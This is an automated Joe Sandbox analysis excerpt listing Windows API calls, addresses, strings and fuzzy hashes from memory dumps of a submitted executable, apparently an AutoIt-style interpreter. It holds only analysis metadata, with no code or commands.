                                                            • Instruction ID: 2f6a3d639fd9816790eaa4094f710f0022669f77bd2d18e4eebed6c0d7489ddf
                                                            • Opcode Fuzzy Hash: e259c6650259b750c2cd7b5d89f8809ca902ecfd693ddb8038564febe03579e9
                                                            • Instruction Fuzzy Hash: 5341C275900209AFEB24DF34DC46A7A77E9EF05700F34446EE649D72D2EA31D941AB21
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D5716A
                                                            • CreateMenu.USER32 ref: 00D57185
                                                            • SetMenu.USER32(?,00000000), ref: 00D57194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D57221
                                                            • IsMenu.USER32(?), ref: 00D57237
                                                            • CreatePopupMenu.USER32 ref: 00D57241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D5726E
                                                            • DrawMenuBar.USER32 ref: 00D57276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 62269ed746ebfac713df66ffdbfa8327b1e2d69e1988171a5dfb56e0c697d017
                                                            • Instruction ID: 0ae266f5d88c2c43676cbd895c7e9cac40baee44e8315150f768122a8e932311
                                                            • Opcode Fuzzy Hash: 62269ed746ebfac713df66ffdbfa8327b1e2d69e1988171a5dfb56e0c697d017
                                                            • Instruction Fuzzy Hash: 18412674A01305AFDF10DF64E944E9A7BB5FB49351F244029FD459B361D731A914CBA0
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D29014
                                                            • GetDlgCtrlID.USER32 ref: 00D2901F
                                                            • GetParent.USER32 ref: 00D2903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D2903E
                                                            • GetDlgCtrlID.USER32(?), ref: 00D29047
                                                            • GetParent.USER32(?), ref: 00D29063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D29066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 1536045017-2258501812
                                                            • Opcode ID: 104ac29ff9fc505160dae0495c1d95d86c3dd8764dc1dcc25f920dc3ef3b486f
                                                            • Instruction ID: 809a5a7a100f5ea1f8f1a498d04408bf60b8bc5ddbfc46fd6112084f3b5c202d
                                                            • Opcode Fuzzy Hash: 104ac29ff9fc505160dae0495c1d95d86c3dd8764dc1dcc25f920dc3ef3b486f
                                                            • Instruction Fuzzy Hash: F121D070A00208BFDF04ABA4DC95EFEBBB5EF59310F10011AB961972A1DB759819EB30
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D290FD
                                                            • GetDlgCtrlID.USER32 ref: 00D29108
                                                            • GetParent.USER32 ref: 00D29124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D29127
                                                            • GetDlgCtrlID.USER32(?), ref: 00D29130
                                                            • GetParent.USER32(?), ref: 00D2914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D2914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 1536045017-2258501812
                                                            • Opcode ID: 2efea23a70cef2891984c4056711a68ae1d29073afa7f84bf1c0013f5382f871
                                                            • Instruction ID: 0be2f8a2295e4f670e05c77efa5b4cf40692808699820f285bc0f6fc3669e9ea
                                                            • Opcode Fuzzy Hash: 2efea23a70cef2891984c4056711a68ae1d29073afa7f84bf1c0013f5382f871
                                                            • Instruction Fuzzy Hash: 7821F274A00308BBDF01ABA4DC99EFEBBB8EF58300F100016BA51973A1DB758819DB30
                                                            APIs
                                                            • GetParent.USER32 ref: 00D2916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00D29184
                                                            • _wcscmp.LIBCMT ref: 00D29196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D29211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-1428604138
                                                            • Opcode ID: 41e0babf2758352fb01cad70cf1e832db74d608f36b6786cb64c83267521117c
                                                            • Instruction ID: 84aaf4960e70d75bb2c1ebcb3fcf921023ef026fb46916b774194b25aacfe197
                                                            • Opcode Fuzzy Hash: 41e0babf2758352fb01cad70cf1e832db74d608f36b6786cb64c83267521117c
                                                            • Instruction Fuzzy Hash: EB112C76248317F9FA213624FC2ADB7B79C9F25725F300026FE10E50D2FE6198516AB5
                                                            APIs
                                                            • _memset.LIBCMT ref: 00CF6E3E
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            • __gmtime64_s.LIBCMT ref: 00CF6ED7
                                                            • __gmtime64_s.LIBCMT ref: 00CF6F0D
                                                            • __gmtime64_s.LIBCMT ref: 00CF6F2A
                                                            • __allrem.LIBCMT ref: 00CF6F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF6F9C
                                                            • __allrem.LIBCMT ref: 00CF6FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF6FD1
                                                            • __allrem.LIBCMT ref: 00CF6FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF7006
                                                            • __invoke_watson.LIBCMT ref: 00CF7077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: 83e816661e8f4be4ebaf64353bfe83dc6f6cd36b9eb1b5dc70245d64b6a67a98
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: E371D776A0071BABD7549F69DC81B7AB7A8EF04724F144229F624D72C1EB70DE4087A2
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32542
                                                            • GetMenuItemInfoW.USER32(00D95890,000000FF,00000000,00000030), ref: 00D325A3
                                                            • SetMenuItemInfoW.USER32(00D95890,00000004,00000000,00000030), ref: 00D325D9
                                                            • Sleep.KERNEL32(000001F4), ref: 00D325EB
                                                            • GetMenuItemCount.USER32(?), ref: 00D3262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00D3264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00D32675
                                                            • GetMenuItemID.USER32(?,?), ref: 00D326BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D32700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D32714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D32735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D56FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D56FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D56FCC
                                                            • _memset.LIBCMT ref: 00D56FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D56FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D57067
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D26BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00D26C18
                                                            • VariantInit.OLEAUT32(?), ref: 00D26C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D26C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00D26C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D26CB1
                                                            • VariantClear.OLEAUT32(?), ref: 00D26CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00D26CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D26CDC
                                                            • VariantClear.OLEAUT32(?), ref: 00D26CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D26CF9
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00D5D47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00D5D49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00D5D6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D5D6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D5D716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 00D5D735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D5D75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00D5D77D
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID: @U=u
                                                            • API String ID: 1211466189-2594219639
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • CoInitialize.OLE32 ref: 00D48403
                                                            • CoUninitialize.OLE32 ref: 00D4840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00D62BEC,?), ref: 00D4846E
                                                            • IIDFromString.OLE32(?,?), ref: 00D484E1
                                                            • VariantInit.OLEAUT32(?), ref: 00D4857B
                                                            • VariantClear.OLEAUT32(?), ref: 00D485DC
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00CD2EAE
                                                              • Part of subcall function 00CD1DB3: GetClientRect.USER32(?,?), ref: 00CD1DDC
                                                              • Part of subcall function 00CD1DB3: GetWindowRect.USER32(?,?), ref: 00CD1E1D
                                                              • Part of subcall function 00CD1DB3: ScreenToClient.USER32(?,?), ref: 00CD1E45
                                                            • GetDC.USER32 ref: 00D0CD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D0CD45
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D0CD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D0CD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 00D0CD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D0CDFB
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: @U=u$U
                                                            • API String ID: 4009187628-4110099822
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00D45793
                                                            • inet_addr.WSOCK32(?), ref: 00D457D8
                                                            • gethostbyname.WSOCK32(?), ref: 00D457E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 00D457F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D45862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D45878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00D458ED
                                                            • WSACleanup.WSOCK32 ref: 00D458F3
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3B4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D3B546
                                                            • GetLastError.KERNEL32 ref: 00D3B550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00D3B5BD
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00D561EB
                                                            • GetDC.USER32(00000000), ref: 00D561F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D561FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00D5620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D56246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D56257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D5902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00D56291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D562B1
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID: @U=u
                                                            • API String ID: 3864802216-2594219639
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D488D7
                                                            • CoInitialize.OLE32(00000000), ref: 00D48904
                                                            • CoUninitialize.OLE32 ref: 00D4890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00D48A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D48B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00D62C0C), ref: 00D48B6F
                                                            • CoGetObject.OLE32(?,00000000,00D62C0C,?), ref: 00D48B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00D48BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D48C25
                                                            • VariantClear.OLEAUT32(?), ref: 00D48C35
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00D37A6C
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D311F0
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D31204
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00D3120B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D30268,?,00000001), ref: 00D3121A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D3122C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D30268,?,00000001), ref: 00D31245
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D30268,?,00000001), ref: 00D31257
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D3129C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D312B1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D312BC
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00CDFAA6
                                                            • OleUninitialize.OLE32(?,00000000), ref: 00CDFB45
                                                            • UnregisterHotKey.USER32(?), ref: 00CDFC9C
                                                            • DestroyWindow.USER32(?), ref: 00D145D6
                                                            • FreeLibrary.KERNEL32(?), ref: 00D1463B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D14668
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            APIs
                                                            • EnumChildWindows.USER32(?,00D2A439), ref: 00D2A377
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            APIs
                                                            • IsWindow.USER32(01406658), ref: 00D5B3EB
                                                            • IsWindowEnabled.USER32(01406658), ref: 00D5B3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00D5B4DB
                                                            • SendMessageW.USER32(01406658,000000B0,?,?), ref: 00D5B512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00D5B54F
                                                            • GetWindowLongW.USER32(01406658,000000EC), ref: 00D5B571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D5B589
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID: @U=u
                                                            • API String ID: 4072528602-2594219639
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D56E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00D56E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D56E52
                                                            • _wcscat.LIBCMT ref: 00D56EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D56EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D56EF2
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: @U=u$SysListView32
                                                            • API String ID: 307300125-1908207174
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D41A50
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D41A7C
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00D41ABE
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D41AD3
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D41AE0
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00D41B10
                                                            • InternetCloseHandle.WININET(00000000), ref: 00D41B57
                                                              • Part of subcall function 00D42483: GetLastError.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D42498
                                                              • Part of subcall function 00D42483: SetEvent.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D424AD
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 2603140658-3916222277
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00D562EC
                                                            • GetWindowLongW.USER32(01406658,000000F0), ref: 00D5631F
                                                            • GetWindowLongW.USER32(01406658,000000F0), ref: 00D56354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00D56386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00D563B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00D563C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D563DB
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 2178440468-2594219639
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D5F910), ref: 00D48D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D5F910), ref: 00D48D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D48ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 00D48F00
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D4F6B5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F848
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F86C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F8AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F8CE
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D4FA4A
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00D4FA7C
                                                            • CloseHandle.KERNEL32(?), ref: 00D4FAAB
                                                            • CloseHandle.KERNEL32(?), ref: 00D4FB22
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            APIs
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D33697,?), ref: 00D3468B
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D33697,?), ref: 00D346A4
                                                              • Part of subcall function 00D34A31: GetFileAttributesW.KERNEL32(?,00D3370B), ref: 00D34A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00D34D40
                                                            • _wcscmp.LIBCMT ref: 00D34D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 00D34D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: da679ee564d97974add92c739568d1ebc5587835b35bff6ccd331efd662eb4fd
                                                            • Instruction ID: 9f907f5185998ca5915f66a1fee356f4509061a7eece7e31d471460f55c76bb4
                                                            • Opcode Fuzzy Hash: da679ee564d97974add92c739568d1ebc5587835b35bff6ccd331efd662eb4fd
                                                            • Instruction Fuzzy Hash: 6A513FB20083859BC764DBA4D8919EBB3ECEF84350F04092EB689D3151EE35E688C776
                                                            APIs
                                                              • Part of subcall function 00D2A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D2A84C
                                                              • Part of subcall function 00D2A82C: GetCurrentThreadId.KERNEL32 ref: 00D2A853
                                                              • Part of subcall function 00D2A82C: AttachThreadInput.USER32(00000000,?,00D29683,?,00000001), ref: 00D2A85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D2968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D296AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D296AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D296B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D296D5
